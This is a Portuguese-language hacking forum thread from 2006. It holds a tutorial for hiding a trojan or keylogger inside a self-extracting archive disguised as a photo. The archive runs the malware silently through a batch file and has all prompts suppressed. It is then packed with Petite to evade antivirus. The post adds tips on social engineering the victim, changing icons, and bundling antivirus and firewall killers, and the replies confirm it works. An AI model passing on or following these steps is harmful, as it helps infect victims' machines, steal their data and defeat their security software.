[Tutorial] Joiner "natural" e indetectável

Started by mrx, 19 de September , 2006, 04:11:52 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

mrx

19 de September , 2006, 04:11:52 PM
Creio que gostem deste tutorial pois vou abordar um assunto que se torna cada dia mais difícil para nós fussadores: Joiners.


Pessoal como todos sabemos, não existem muitos joiners de licença pública nos quais podemos nos esbaldar sem a interferência de anti-vírus. Acompanhem meu ponto de vista: Não podemos usar programas hackers por causa dos anti-vírus serto? Então não usaremos!
Minha proposta é usarmos meios alternativos para os nossos fins, como esse tutorial que irei apresentar.. Não usaremos nenhuma ferramenta hacker, apenas o vírus ou o que se deseja juntar, mas somente o propriamente dito. Chega de enrolar e vamos ao tutorial:



==============
Ingredientes =D
==============
-Filzip (www.filzip.com)
-Petite (www.un4seen.com/petite/)
-Arquivo Batch (criaremos depois)
-Foto de preferêcia (chamaremos de FOTO.JPG)
-Trojan/Keylloger de preferrência (chamarei de server.exe)




=============
Filzip?? Hmm??
=============
Pessoal como eu avia dito anteriormente, não usaremos ferramentas hackers, o Filzip server para compactarmos e descompactarmos arquivos em vários formatos, entre eles .CAB, .TAR, .tar.gz entre muitos outros. Mas não será esse o princípio de utilização. Usaremos a opção de gerar arquivos auto-extraíveis no formato .EXE. Entendamos como um joiner funciona:
-O joiner pega o código dos arquivos a serem juntados
-Após isso ele os envolve em seu código fonte (como uma sacola, lá dentro eles estão separados)
-Quando executado, o joiner manda os arquivos que estão lá dentro para a pasta temporária de seu computador (C:/Windows/TEMP) e manda um comando para executálos.
-Em seguida os arquivos que foram copiados para a pasta TEMP são apagados.



Adivinha o que a função de gerar arquivos auto-extraíveis do Filzip faz? Isso mesmo! Podemos conciderar o filzip como um joiner faltando opções.



==========
Petite
==========
O nosso velho amigo petite. Ele serve para compactar arquivos .EXE mudando seu código. Se ele muda o código verdadeiro, o anti-vírus não achará nada.





===============
Hey Ho! Let's Go!
===============

Pessoal antes de tudo lembrem-se de desativar seus anti-vírus (se forem mecher com algo que eles peguem, é claro). Instale o Filzip e descompacte o Petite na sua pasta do windows (normalmente C:\WINDOWS).
Após feito isso iremos fazer um arquivo BATCH, irei explicar o por que depois.
Abra o bloco de notas e digite:



@ECHO OFF
START /max C:\WINDOWS\FOTO.JPG
START /m C:\WINDOWS\SERVER.EXE
EXIT



Salve esse arquivo com o nome INSERT.BAT.
Após todo essse processo, crie um arquivo zipado com o Filzip e adicione lá dentro:


-FOTO.JPG
-SERVER.EXE
-INSERT.BAT


Feito isso, note o botão AÇÕES lá em sima da janela do Filzip, Clieque-o, e dessa até GERAR ARQUIVO .EXE, clique.
Em seguida irá abrir uma janela com as opções para gerar o arquivo auto-extraível, irei mostrar o que marcar e desmacar dando uma explicação do por que logo abaixo.


Mude DESTINO para C:\WINDOWS
=> Isso fará com que os arquívos sejam extraídos nesta pasta, para os comandos do arquivo Batch que criamos acharem os arquivos também.
Mude o TÍTULO DA APLICAÇÃO para picture0001
=> Apenas uma engenharia social básica =D
Acrecente em LINHA DE COMANDO o seguinte: C:\WINDOWS\INSERT.BAT
=> Com isso, logo após os arquivos serem extraídos esse comando irá rodar, fazendo com que o aqruivo que criamos abra, concequentemente rodando os comandos que estão apontados dentro do aqruivo BAT, abrindo a FOTO.JPG e o arquivo SERVER.EXE
Mude ARQUIVOS EXITENTES para SEMPRE SOBRESCREVER.
=> Assim o usuário não receberá a mensagem chata dizendo "Você deseja substituir os arquivos existentes?". Provavelmente alertando a vítima.
Em CONFIGURAÇÕES DO AUTO EXTRATOR desmarque as opções MOSTRAR OPÇÕES DE SOBRESCREVER e MOSTRAR LISTA DE ARQUIVOS. Após marque a opção NÃO PERGUNTAR ANTES DE EXTRAÍR.
=> Assim eliminamos a possibilidade da vítima ter que clicar em alguma pergunta do tipo SIM ou NÃO, botando em risco a funcionabilidade do plano.
Clique em OK.


Pronto, agora ele está totalmente em "estado automático", basta clicar para que ele estráia os arquivos, rode o batch e rode a foto e o server... Há um porém, o anti-vírus pode "ver" o que tem dentro deste pacote. Ai entra o petite =D
Vou aceitar a ipótese de que o arquivo que você acabou de criar se chame Picture.exe e está localizado na área de trabalho.
Abra seu prompt (tela principal do MS-DOS) e digite:
PETITE C:\WINDOWS\DESKTOP\PICTURE.EXE


Pronto pessoal, o anti-vírus não pode mais "ver" o conteúdo..
Espero que aproveitem esse tutorial feito com muita dedicação e imaginação. E lembrem-se: Procure SOFTWARES para o que você quer e não HACKER TOOLS...



===============
PONTOS A DECLARAR
===============
-Alguns ati-vírus podem identificar o petite como um hacker tool, mais são raros.
-Ah sim! O ícone chato que ficou? http:www.shelllabs.com/icon_changer.htm ele muda qualquer ícone =D
-Após os arquivos serem extraídos o anti-vírus pode pegar... Aconcelho camuflar ele usando um packing ou um crypting...
-Por que não usar o Winrar? Sem sucesso na hora de comprimir com o petite.
-Aconcelho não deletar mais o Filzip pois, na minha opinião, ele é o melhor do compressor que existe (freeware), até mesmo melhor que o popular WinRar... Utilizo ele com frequência.
-Para a vítima não estranhar o MS-DOS abrindo e fechando, ponha um jogo pequeno no lugar da foto, diga que foi de sua autoria e gostaria que testasse (imaginação).
-Você pode anexar mais arquivos como um AV-Killer, ou um Firewall-Killer.. Só não esqueça de acrescentá-los no arquivo Bath!
CREDITOS: tripbr


Voltando a ativa. ;P

_Dr4k0_

#3
25 de September , 2006, 06:46:52 PM
Quote from: "Bolo":-\


Funciona normalmente..Se não o que adiantaria ter um joiner se ele fizesse o programa parar de funcionar..

e

Quote from: "Bolo"Muito bom tutorial  :o

Vamos deixar desses tipos de comentários que não ajudam em nada o tópico..normalmente em user's veteranos os moderas mandam -1
100% Livre!!!Livre para escolher o que há de melhor no Windows e Linux. Livre de preconceito direto ou inverso!
Adote essa filosofia e tenha mais chance de sucesso profissional.

#phobia

#4
25 de September , 2006, 07:08:44 PM
Testei aqui e não funcionou após passar pelo Petite.

_Dr4k0_

#5
25 de September , 2006, 07:16:07 PM
Quote from: "DarkShadow"Testei aqui e não funcionou após passar pelo Petite.

Mais voce tem certeza que fez da maneira certinha?Pq se ele deixar de funcionar ele perde a "funcionalidade" que é esconder do AV e continuar funcionando..Que se for pra não funcionar é mais facil enviar qualquer arquivo :P

Vou fazer uns testes aqui no VMWare e logo posto as respostas
100% Livre!!!Livre para escolher o que há de melhor no Windows e Linux. Livre de preconceito direto ou inverso!
Adote essa filosofia e tenha mais chance de sucesso profissional.

mrx

#6
01 de October , 2006, 09:50:43 PM
Ae pessoal, blz??

Olha, Aqui Funcionou..


Voltando a ativa. ;P
Print
Go Up Pages1
User actions